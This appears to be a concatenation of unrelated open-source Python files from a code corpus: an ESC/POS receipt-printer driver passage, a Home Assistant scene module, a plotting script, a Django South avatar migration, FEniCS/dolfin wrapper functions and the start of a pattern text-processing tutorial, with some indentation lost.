self._raw(TXT_ALIGN_CT)
# Height
if height >=2 or height <=6:
self._raw(BARCODE_HEIGHT)
else:
raise BarcodeSizeError()
# Width
if width >= 1 or width <=255:
self._raw(BARCODE_WIDTH)
else:
raise BarcodeSizeError()
# Font
if font.upper() == "B":
self._raw(BARCODE_FONT_B)
else: # DEFAULT FONT: A
self._raw(BARCODE_FONT_A)
# Position
if pos.upper() == "OFF":
self._raw(BARCODE_TXT_OFF)
elif pos.upper() == "BOTH":
self._raw(BARCODE_TXT_BTH)
elif pos.upper() == "ABOVE":
self._raw(BARCODE_TXT_ABV)
else: # DEFAULT POSITION: BELOW
self._raw(BARCODE_TXT_BLW)
# Type
if bc.upper() == "UPC-A":
self._raw(BARCODE_UPC_A)
elif bc.upper() == "UPC-E":
self._raw(BARCODE_UPC_E)
elif bc.upper() == "EAN13":
self._raw(BARCODE_EAN13)
elif bc.upper() == "EAN8":
self._raw(BARCODE_EAN8)
elif bc.upper() == "CODE39":
self._raw(BARCODE_CODE39)
elif bc.upper() == "ITF":
self._raw(BARCODE_ITF)
elif bc.upper() == "NW7":
self._raw(BARCODE_NW7)
else:
raise BarcodeTypeError()
# Print Code
if code:
self._raw(code)
else:
raise exception.BarcodeCodeError()
def receipt(self,xml):
"""
Prints an xml based receipt definition
"""
def strclean(string):
if not string:
string = ''
string = string.strip()
string = re.sub('\s+',' ',string)
return string
def format_value(value, decimals=3, width=0, decimals_separator='.', thousands_separator=',', autoint=False, symbol='', position='after'):
decimals = max(0,int(decimals))
width = max(0,int(width))
value = float(value)
if autoint and math.floor(value) == value:
decimals = 0
if width == 0:
width = ''
if thousands_separator:
formatstr = "{:"+str(width)+",."+str(decimals)+"f}"
else:
formatstr = "{:"+str(width)+"."+str(decimals)+"f}"
ret = formatstr.format(value)
ret = ret.replace(',','COMMA')
ret = ret.replace('.','DOT')
ret = ret.replace('COMMA',thousands_separator)
ret = ret.replace('DOT',decimals_separator)
if symbol:
if position == 'after':
ret = ret + symbol
else:
ret = symbol + ret
return ret
def print_elem(stylestack, serializer, elem, indent=0):
elem_styles = {
'h1': {'bold': 'on', 'size':'double'},
'h2': {'size':'double'},
'h3': {'bold': 'on', 'size':'double-height'},
'h4': {'size': 'double-height'},
'h5': {'bold': 'on'},
'em': {'font': 'b'},
'b': {'bold': 'on'},
}
stylestack.push()
if elem.tag in elem_styles:
stylestack.set(elem_styles[elem.tag])
stylestack.set(elem.attrib)
if elem.tag in ('p','div','section','article','receipt','header','footer','li','h1','h2','h3','h4','h5'):
serializer.start_block(stylestack)
serializer.text(elem.text)
for child in elem:
print_elem(stylestack,serializer,child)
serializer.start_inline(stylestack)
serializer.text(child.tail)
serializer.end_entity()
serializer.end_entity()
elif elem.tag in ('span','em','b','left','right'):
serializer.start_inline(stylestack)
serializer.text(elem.text)
for child in elem:
print_elem(stylestack,serializer,child)
serializer.start_inline(stylestack)
serializer.text(child.tail)
serializer.end_entity()
serializer.end_entity()
elif elem.tag == 'value':
serializer.start_inline(stylestack)
serializer.pre(format_value(
elem.text,
decimals=stylestack.get('value-decimals'),
width=stylestack.get('value-width'),
decimals_separator=stylestack.get('value-decimals-separator'),
thousands_separator=stylestack.get('value-thousands-separator'),
autoint=(stylestack.get('value-autoint') == 'on'),
symbol=stylestack.get('value-symbol'),
position=stylestack.get('value-symbol-position')
))
serializer.end_entity()
elif elem.tag == 'line':
width = stylestack.get('width')
if stylestack.get('size') in ('double', 'double-width'):
width = width / 2
lineserializer = XmlLineSerializer(stylestack.get('indent')+indent,stylestack.get('tabwidth'),width,stylestack.get('line-ratio'))
serializer.start_block(stylestack)
for child in elem:
if child.tag == 'left':
print_elem(stylestack,lineserializer,child,indent=indent)
elif child.tag == 'right':
lineserializer.start_right()
print_elem(stylestack,lineserializer,child,indent=indent)
serializer.pre(lineserializer.get_line())
serializer.end_entity()
elif elem.tag == 'ul':
serializer.start_block(stylestack)
bullet = stylestack.get('bullet')
for child in elem:
if child.tag == 'li':
serializer.style(stylestack)
serializer.raw(' ' * indent * stylestack.get('tabwidth') + bullet)
print_elem(stylestack,serializer,child,indent=indent+1)
serializer.end_entity()
elif elem.tag == 'ol':
cwidth = len(str(len(elem))) + 2
i = 1
serializer.start_block(stylestack)
for child in elem:
if child.tag == 'li':
serializer.style(stylestack)
serializer.raw(' ' * indent * stylestack.get('tabwidth') + ' ' + (str(i)+')').ljust(cwidth))
i = i + 1
print_elem(stylestack,serializer,child,indent=indent+1)
serializer.end_entity()
elif elem.tag == 'pre':
serializer.start_block(stylestack)
serializer.pre(elem.text)
serializer.end_entity()
elif elem.tag == 'hr':
width = stylestack.get('width')
if stylestack.get('size') in ('double', 'double-width'):
width = width / 2
serializer.start_block(stylestack)
serializer.text('-'*width)
serializer.end_entity()
elif elem.tag == 'br':
serializer.linebreak()
elif elem.tag == 'img':
if 'src' in elem.attrib and 'data:' in elem.attrib['src']:
self.print_base64_image(elem.attrib['src'])
elif elem.tag == 'barcode' and 'encoding' in elem.attrib:
serializer.start_block(stylestack)
self.barcode(strclean(elem.text),elem.attrib['encoding'])
serializer.end_entity()
elif elem.tag == 'cut':
self.cut()
elif elem.tag == 'partialcut':
self.cut(mode='part')
elif elem.tag == 'cashdraw':
self.cashdraw(2)
self.cashdraw(5)
stylestack.pop()
try:
stylestack = StyleStack()
serializer = XmlSerializer(self)
root = ET.fromstring(xml.encode('utf-8'))
self._raw(stylestack.to_escpos())
print_elem(stylestack,serializer,root)
if 'open-cashdrawer' in root.attrib and root.attrib['open-cashdrawer'] == 'true':
self.cashdraw(2)
self.cashdraw(5)
if not 'cut' in root.attrib or root.attrib['cut'] == 'true' :
self.cut()
except Exception as e:
errmsg = str(e)+'\n'+'-'*48+'\n'+traceback.format_exc() + '-'*48+'\n'
self.text(errmsg)
self.cut()
raise e
def text(self,txt):
""" Print Utf8 encoded alpha-numeric text """
if not txt:
return
try:
txt = txt.decode('utf-8')
except:
try:
txt = txt.decode('utf-16')
except:
pass
self.extra_chars = 0
def encode_char(char):
"""
Encodes a single utf-8 character into a sequence of
esc-pos code page change instructions and character declarations
"""
char_utf8 = char.encode('utf-8')
encoded = ''
encoding = self.encoding # we reuse the last encoding to prevent code page switches at every character
encodings = {
# TODO use ordering to prevent useless switches
# TODO Support other encodings not natively supported by python ( Thai, Khazakh, Kanjis )
'cp437': TXT_ENC_PC437,
'cp850': TXT_ENC_PC850,
'cp852': TXT_ENC_PC852,
'cp857': TXT_ENC_PC857,
'cp858': TXT_ENC_PC858,
'cp860': TXT_ENC_PC860,
'cp863': TXT_ENC_PC863,
'cp865': TXT_ENC_PC865,
'cp866': TXT_ENC_PC866,
'cp862': TXT_ENC_PC862,
'cp720': TXT_ENC_PC720,
'iso8859_2': TXT_ENC_8859_2,
'iso8859_7': TXT_ENC_8859_7,
'iso8859_9': TXT_ENC_8859_9,
'cp1254' : TXT_ENC_WPC1254,
'cp1255' : TXT_ENC_WPC1255,
'cp1256' : TXT_ENC_WPC1256,
'cp1257' : TXT_ENC_WPC1257,
'cp1258' : TXT_ENC_WPC1258,
'katakana' : TXT_ENC_KATAKANA,
}
remaining = copy.copy(encodings)
if not encoding :
encoding = 'cp437'
while True: # Trying all encoding until one succeeds
try:
if encoding == 'katakana': # Japanese characters
if jcconv:
# try to convert japanese text to a half-katakanas
kata = jcconv.kata2half(jcconv.hira2kata(char_utf8))
if kata != char_utf8:
self.extra_chars += len(kata.decode('utf-8')) - 1
# the conversion may result in multiple characters
return encode_str(kata.decode('utf-8'))
else:
kata = char_utf8
if kata in TXT_ENC_KATAKANA_MAP:
encoded = TXT_ENC_KATAKANA_MAP[kata]
break
else:
raise ValueError()
else:
encoded = char.encode(encoding)
break
except ValueError: #the encoding failed, select another one and retry
if encoding in remaining:
del remaining[encoding]
if len(remaining) >= 1:
encoding = remaining.items()[0][0]
else:
encoding = 'cp437'
encoded = '\xb1' # could not encode, output error character
break;
if encoding != self.encoding:
# if the encoding changed, remember it and prefix the character with
# the esc-pos encoding change sequence
self.encoding = encoding
encoded = encodings[encoding] + encoded
return encoded
def encode_str(txt):
buffer = ''
for c in txt:
buffer += encode_char(c)
return buffer
txt = encode_str(txt)
# if the utf-8 -> codepage conversion inserted extra characters,
# remove double spaces to try to restore the original string length
# and prevent printing alignment issues
while self.extra_chars > 0:
dspace = txt.find(' ')
if dspace > 0:
txt = txt[:dspace] + txt[dspace+1:]
self.extra_chars -= 1
else:
break
self._raw(txt)
def set(self, align='left', font='a', type='normal', width=1, height=1):
""" Set text properties """
# Align
if align.upper() == "CENTER":
self._raw(TXT_ALIGN_CT)
elif align.upper() == "RIGHT":
self._raw(TXT_ALIGN_RT)
elif align.upper() == "LEFT":
self._raw(TXT_ALIGN_LT)
# Font
if font.upper() == "B":
self._raw(TXT_FONT_B)
else: # DEFAULT FONT: A
self._raw(TXT_FONT_A)
# Type
if type.upper() == "B":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL_OFF)
elif type.upper() == "U":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL_ON)
elif type.upper() == "U2":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL2_ON)
elif type.upper() == "BU":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL_ON)
elif type.upper() == "BU2":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL2_ON)
elif type.upper == "NORMAL":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL_OFF)
# Width
if width == 2 and height != 2:
self._raw(TXT_NORMAL)
self._raw(TXT_2WIDTH)
elif height == 2 and width != 2:
self._raw(TXT_NORMAL)
self._raw(TXT_2HEIGHT)
elif height == 2 and width == 2:
self._raw(TXT_2WIDTH)
self._raw(TXT_2HEIGHT)
else: # DEFAULT SIZE: NORMAL
self._raw(TXT_NORMAL)
def cut(self, mode=''):
""" Cut paper """
# Fix the size between last line and cut
# TODO: handle this with a line feed
self._raw("\n\n\n\n\n\n")
if mode.upper() == "PART":
self._raw(PAPER_PART_CUT)
else: # DEFAULT MODE: FULL CUT
self._raw(PAPER_FULL_CUT)
def cashdraw(self, pin):
""" Send pulse to kick the cash drawer """
if pin == 2:
self._raw(CD_KICK_2)
elif pin == 5:
self._raw(CD_KICK_5)
else:
raise CashDrawerError()
def hw(self, hw):
""" Hardware operations """
if hw.upper() == "INIT":
self._raw(HW_INIT)
elif hw.upper() == "SELECT":
self._raw(HW_SELECT)
elif hw.upper() == "RESET":
self._raw(HW_RESET)
else: # DEFAULT: DOES NOTHING
pass
def control(self, ctl):
""" Feed control sequences """
if ctl.upper() == "LF":
self._raw(CTL_LF)
elif ctl.upper() == "FF":
self._raw(CTL_FF)
elif ctl.upper() == "CR":
self._raw(CTL_CR)
elif ctl.upper() == "HT":
self._raw(CTL_HT)
elif ctl.upper() == "VT":
self._raw(CTL_VT)
| agpl-3.0 |
molobrakos/home-assistant | homeassistant/components/homeassistant/scene.py | 8 | 2923 | """Allow users to set and activate scenes."""
from collections import namedtuple
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_STATE, CONF_ENTITIES, CONF_NAME, CONF_PLATFORM,
STATE_OFF, STATE_ON)
from homeassistant.core import State
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.state import HASS_DOMAIN, async_reproduce_state
from homeassistant.components.scene import STATES, Scene
# Validation schema for `scene:` entries using the `homeassistant` platform:
# a list of scenes, each with a name and a mapping of entity_id to either a
# bare state value (str/bool) or a dict of state + attributes.
PLATFORM_SCHEMA = vol.Schema({
    vol.Required(CONF_PLATFORM): HASS_DOMAIN,
    vol.Required(STATES): vol.All(
        cv.ensure_list,
        [
            {
                vol.Required(CONF_NAME): cv.string,
                vol.Required(CONF_ENTITIES): {
                    cv.entity_id: vol.Any(str, bool, dict)
                },
            }
        ]
    ),
}, extra=vol.ALLOW_EXTRA)

# Internal processed form of one scene: .name plus a mapping of
# entity_id -> desired State.
SCENECONFIG = namedtuple('SceneConfig', [CONF_NAME, STATES])
async def async_setup_platform(hass, config, async_add_entities,
                               discovery_info=None):
    """Set up home assistant scene entries."""
    # One HomeAssistantScene entity per configured scene; the raw config is
    # normalized into a SCENECONFIG by _process_config first.
    async_add_entities(
        HomeAssistantScene(hass, _process_config(raw_scene))
        for raw_scene in config.get(STATES)
    )
    return True
def _process_config(scene_config):
    """Process passed in config into a format to work with.

    Async friendly. Returns a SCENECONFIG whose `states` maps lowercased
    entity ids to the State each entity should be put into.
    """
    entity_conf = dict(scene_config.get(CONF_ENTITIES, {}))
    states = {}

    for entity_id, conf in entity_conf.items():
        # Each entry is either a bare state value, or a dict holding the
        # state under ATTR_STATE plus extra attributes to reproduce.
        if isinstance(conf, dict):
            attributes = conf.copy()
            raw_state = attributes.pop(ATTR_STATE, None)
        else:
            raw_state = conf
            attributes = {}

        # YAML translates 'on' to a boolean
        # http://yaml.org/type/bool.html
        if isinstance(raw_state, bool):
            final_state = STATE_ON if raw_state else STATE_OFF
        else:
            final_state = str(raw_state)

        states[entity_id.lower()] = State(entity_id, final_state, attributes)

    return SCENECONFIG(scene_config.get(CONF_NAME), states)
class HomeAssistantScene(Scene):
    """A scene is a group of entities and the states we want them to be."""

    def __init__(self, hass, scene_config):
        """Initialize the scene."""
        self.hass = hass
        # `scene_config` is a SCENECONFIG namedtuple: `name` plus a mapping
        # of entity_id -> desired State.
        self.scene_config = scene_config

    @property
    def name(self):
        """Return the name of the scene."""
        return self.scene_config.name

    @property
    def device_state_attributes(self):
        """Return the scene state attributes."""
        # Expose which entity ids this scene controls.
        return {
            ATTR_ENTITY_ID: list(self.scene_config.states.keys()),
        }

    async def async_activate(self):
        """Activate scene. Try to get entities into requested state."""
        # NOTE(review): the positional True is presumably the `blocking`
        # flag — confirm against helpers.state.async_reproduce_state.
        await async_reproduce_state(
            self.hass, self.scene_config.states.values(), True)
| apache-2.0 |
jbornschein/y2k | show-layerwise.py | 6 | 1957 | #!/usr/bin/env python
from __future__ import division
import sys
import logging
from time import time
import cPickle as pickle
import numpy as np
import h5py
import pylab
#import theano
#import theano.tensor as T
_logger = logging.getLogger()
#=============================================================================
if __name__ == "__main__":
import argparse
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action="store_true", default=False)
parser.add_argument('--dataset', '-d', default="valiset")
parser.add_argument('--samples', '-s', default=100)
parser.add_argument('--stacked', action="store_true", default=False)
parser.add_argument('out_dir', nargs=1)
args = parser.parse_args()
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
FORMAT = '[%(asctime)s] %(message)s'
DATEFMT = "%H:%M:%S"
logging.basicConfig(format=FORMAT, datefmt=DATEFMT, level=level)
fname = args.out_dir[0]+"/results.h5"
table = "%s.spl%d.Hp" % (args.dataset, args.samples)
try:
with h5py.File(fname, "r") as h5:
Hp = h5[table][:]
except KeyError, e:
logger.info("Failed to read data from %s: %s" % (fname, e))
exit(1)
except IOError, e:
logger.info("Failed to open %s fname: %s" % (fname, e))
exit(1)
epochs = Hp.shape[0]
n_layers = Hp.shape[1]
if args.stacked:
ylim = 2*Hp[-1].sum()
pylab.ylim([ylim, 0])
pylab.stackplot(np.arange(epochs), Hp[:,::-1].T)
else:
ylim = 2*Hp[-1].min()
pylab.ylim([ylim, 0])
pylab.plot(Hp)
#pylab.figsize(12, 8)
pylab.xlabel("Epochs")
#pylab.ylabel("avg_{x~testdata} log( E_{h~q}[p(x,h)/q(h|x)]")
pylab.legend(["layer %d" % i for i in xrange(n_layers)], loc="lower right")
pylab.show(block=True)
| agpl-3.0 |
imgmix/django-avatar | avatar/south_migrations/0001_initial.py | 4 | 4766 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
    # South schema migration: creates (and can drop) the avatar_avatar table.

    def forwards(self, orm):
        """Create the 'Avatar' model (table avatar_avatar)."""
        # Adding model 'Avatar'
        db.create_table('avatar_avatar', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
            ('primary', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('avatar', self.gf('django.db.models.fields.files.ImageField')(max_length=1024, blank=True)),
            ('date_uploaded', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
        ))
        db.send_create_signal('avatar', ['Avatar'])

    def backwards(self, orm):
        """Reverse of forwards: drop the 'Avatar' model."""
        # Deleting model 'Avatar'
        db.delete_table('avatar_avatar')

    # Frozen ORM definitions auto-generated by South; do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'avatar.avatar': {
            'Meta': {'object_name': 'Avatar'},
            'avatar': ('django.db.models.fields.files.ImageField', [], {'max_length': '1024', 'blank': 'True'}),
            'date_uploaded': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'primary': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['avatar']
ellipsis14/dolfin-adjoint | timestepping/python/timestepping/fenics_overrides.py | 1 | 8590 | #!/usr/bin/env python2
# Copyright (C) 2011-2012 by Imperial College London
# Copyright (C) 2013 University of Oxford
# Copyright (C) 2014 University of Edinburgh
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import dolfin
import ufl
from exceptions import *
from fenics_utils import *
__all__ = \
[
"_KrylovSolver",
"_LinearSolver",
"_LUSolver",
"_assemble",
"_assemble_classes",
"DirichletBC",
"LinearSolver",
"action",
"adjoint",
"assemble",
"derivative",
"homogenize",
"lhs",
"replace",
"rhs"
]
# Assembly and linear solver functions and classes used in this module. These
# can be overridden externally.
_KrylovSolver = dolfin.KrylovSolver
_LinearSolver = dolfin.LinearSolver
_LUSolver = dolfin.LUSolver
_assemble = dolfin.assemble
class DirichletBC(dolfin.DirichletBC):
    """
    Wrapper for DOLFIN DirichletBC. Adds homogenized method.
    """

    def __init__(self, *args, **kwargs):
        dolfin.DirichletBC.__init__(self, *args, **kwargs)
        # Cache for the homogenised copy, built lazily by homogenized().
        self.__hbc = None

        return

    def homogenized(self):
        """
        Return a homogenised version of this DirichletBC.
        """
        # Build the homogenised BC once and reuse it on later calls.
        if self.__hbc is None:
            self.__hbc = dolfin.DirichletBC(self.function_space(), self.value(), *self.domain_args, method = self.method())
            self.__hbc.homogenize()
            # Propagate the timestepping "static" marker, if present.
            if hasattr(self, "_time_static"):
                self.__hbc._time_static = self._time_static

        return self.__hbc
def homogenize(bc):
    """
    Return a homogenised version of the supplied DirichletBC.
    """
    if isinstance(bc, DirichletBC):
        # Our wrapper caches its homogenised copy.
        return bc.homogenized()
    elif isinstance(bc, dolfin.cpp.DirichletBC):
        # Plain DOLFIN BC: build a fresh homogenised wrapper copy.
        hbc = DirichletBC(bc.function_space(), bc.value(), *bc.domain_args, method = bc.method())
        hbc.homogenize()
        # Propagate the timestepping "static" marker, if present.
        if hasattr(bc, "_time_static"):
            hbc._time_static = bc._time_static
    else:
        raise InvalidArgumentException("bc must be a DirichletBC")

    return hbc
def LinearSolver(*args, **kwargs):
    """
    Return a linear solver.

    Arguments: One of:
      1. Arguments as accepted by the DOLFIN LinearSolver constructor.
    or:
      2. A dictionary of linear solver parameters.
    """

    # Case 1: plain constructor arguments -- delegate straight to DOLFIN.
    if not len(args) == 1 or not len(kwargs) == 0 or not isinstance(args[0], dict):
        return _LinearSolver(*args, **kwargs)
    linear_solver_parameters = args[0]

    # Case 2: a parameters dictionary.  Split it into the solver name, the
    # preconditioner, and per-backend option dictionaries.
    linear_solver = "lu"
    pc = None
    kp = {}  # Krylov solver options
    lp = {}  # LU solver options
    for key in linear_solver_parameters:
        if key == "linear_solver":
            linear_solver = linear_solver_parameters[key]
        elif key == "preconditioner":
            pc = linear_solver_parameters[key]
        elif key == "krylov_solver":
            kp = linear_solver_parameters[key]
        elif key == "lu_solver":
            lp = linear_solver_parameters[key]
        elif key in ["print_matrix", "print_rhs", "reset_jacobian", "symmetric"]:
            raise NotImplementedException("Unsupported linear solver parameter: %s" % key)
        else:
            raise InvalidArgumentException("Unexpected linear solver parameter: %s" % key)

    # Decide between a direct (LU) and an iterative (Krylov) solver.
    if linear_solver in ["default", "direct", "lu"]:
        is_lu = True
        linear_solver = "default"
    elif linear_solver == "iterative":
        is_lu = False
        linear_solver = "gmres"
    else:
        is_lu = dolfin.has_lu_solver_method(linear_solver)

    if is_lu:
        linear_solver = _LUSolver(linear_solver)
        linear_solver.parameters.update(lp)
    else:
        if pc is None:
            linear_solver = _KrylovSolver(linear_solver)
        else:
            linear_solver = _KrylovSolver(linear_solver, pc)
        linear_solver.parameters.update(kp)

    return linear_solver
def adjoint(form, reordered_arguments = None, adjoint_arguments = None):
    """
    Wrapper for the DOLFIN adjoint function. Accepts the additional optional
    adjoint_arguments, which if supplied should be a tuple of Argument s
    corresponding to the adjoint test and trial functions. Correctly handles
    QForm s.
    """

    if adjoint_arguments is None:
        a_form = dolfin.adjoint(form, reordered_arguments = reordered_arguments)
    elif not reordered_arguments is None:
        raise InvalidArgumentException("Cannot supply both reordered_arguments and adjoint_arguments keyword arguments")
    else:
        if not len(adjoint_arguments) == 2 \
          or not isinstance(adjoint_arguments[0], ufl.argument.Argument) \
          or not isinstance(adjoint_arguments[1], ufl.argument.Argument):
            raise InvalidArgumentException("adjoint_arguments must be a pair of Argument s")
        a_test, a_trial = adjoint_arguments
        # Take the adjoint with default arguments first, then substitute the
        # caller-supplied test and trial functions in their place.
        a_form = dolfin.adjoint(form)
        test, trial = extract_test_and_trial(a_form)
        # The supplied arguments must live in the same elements as those the
        # default adjoint produced.
        if not test.element() == a_test.element() or not trial.element() == a_trial.element():
            raise InvalidArgumentException("Invalid adjoint_arguments")
        a_form = replace(a_form, {test:a_test, trial:a_trial})

    # Preserve any quadrature degree attached to the input form.
    if isinstance(form, QForm):
        return QForm(a_form, quadrature_degree = form.quadrature_degree())
    else:
        return a_form
def replace(e, mapping):
    """
    Wrapper for the DOLFIN replace function. Correctly handles QForm s.
    """
    if not isinstance(mapping, dict):
        raise InvalidArgumentException("mapping must be a dictionary")
    # Nothing to substitute: return the input unchanged.
    if not mapping:
        return e

    replaced = dolfin.replace(e, mapping)
    if not isinstance(e, QForm):
        return replaced
    # Carry the quadrature degree of the original QForm over.
    return QForm(replaced, quadrature_degree = form_quadrature_degree(e))
def lhs(form):
    """
    Wrapper for the DOLFIN lhs function. Correctly handles QForm s.
    """
    if not isinstance(form, ufl.form.Form):
        raise InvalidArgumentException("form must be a Form")
    result = dolfin.lhs(form)
    if not isinstance(form, QForm):
        return result
    # Carry the quadrature degree of the original QForm over.
    return QForm(result, quadrature_degree = form_quadrature_degree(form))
def rhs(form):
    """
    Wrapper for the DOLFIN rhs function. Correctly handles QForm s.
    """
    if not isinstance(form, ufl.form.Form):
        raise InvalidArgumentException("form must be a Form")
    result = dolfin.rhs(form)
    if not isinstance(form, QForm):
        return result
    # Carry the quadrature degree of the original QForm over.
    return QForm(result, quadrature_degree = form_quadrature_degree(form))
def derivative(form, u, du = None, expand = True):
    """
    Wrapper for the DOLFIN derivative function. This attempts to select an
    appropriate du if one is not supplied. Correctly handles QForm s. By default
    the returned Form is first expanded using ufl.algorithms.expand_derivatives.
    This can be disabled if the optional expand argument is False.
    """

    if du is None:
        # Choose a derivative direction matching the type of u and the rank
        # of the form: rank-0 forms get a test function, rank-1 forms a
        # trial function.
        if isinstance(u, dolfin.Constant):
            du = dolfin.Constant(1.0)
        elif isinstance(u, dolfin.Function):
            rank = form_rank(form)
            if rank == 0:
                du = dolfin.TestFunction(u.function_space())
            elif rank == 1:
                du = dolfin.TrialFunction(u.function_space())
            # NOTE(review): for rank > 1 (or other u types) du stays None and
            # dolfin.derivative is left to pick its own direction -- confirm
            # this is intentional.

    der = dolfin.derivative(form, u, du = du)
    if expand:
        der = ufl.algorithms.expand_derivatives(der)
    if isinstance(form, QForm):
        return QForm(der, quadrature_degree = form.quadrature_degree())
    else:
        return der
def action(form, coefficient):
    """
    Wrapper for the DOLFIN action function. Correctly handles QForm s.
    """
    if not isinstance(form, ufl.form.Form):
        raise InvalidArgumentException("form must be a Form")
    if not isinstance(coefficient, dolfin.Function):
        raise InvalidArgumentException("coefficient must be a Function")
    result = dolfin.action(form, coefficient)
    if not isinstance(form, QForm):
        return result
    # Carry the quadrature degree of the original QForm over.
    return QForm(result, quadrature_degree = form_quadrature_degree(form))
# Classes whose instances provide their own assemble() method (e.g. PAForm,
# TimeSystem) register themselves here so assemble() can dispatch to them.
_assemble_classes = []

def assemble(*args, **kwargs):
    """
    Wrapper for the DOLFIN assemble function. Correctly handles PAForm s,
    TimeSystem s and QForm s.
    """
    if isinstance(args[0], QForm):
        # A QForm carries its own form compiler parameters; a caller-supplied
        # set would conflict with them.
        if "form_compiler_parameters" in kwargs:
            raise InvalidArgumentException("Cannot supply form_compiler_parameters argument when assembling a QForm")
        return _assemble(form_compiler_parameters = args[0].form_compiler_parameters(), *args, **kwargs)
    elif isinstance(args[0], tuple(_assemble_classes)):
        # Registered classes know how to assemble themselves.
        return args[0].assemble(*args[1:], **kwargs)
    else:
        return _assemble(*args, **kwargs)
| lgpl-3.0 |
arne-cl/pattern | examples/05-vector/01-document.py | 21 | 3205 | import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# NOTE: this is a Python 2 tutorial script (print statements).
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
# can be used to compare documents. The word count in a document is normalized
# between 0.0-1.0 so that shorted documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".

s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""

# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print

# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):

#import os, codecs
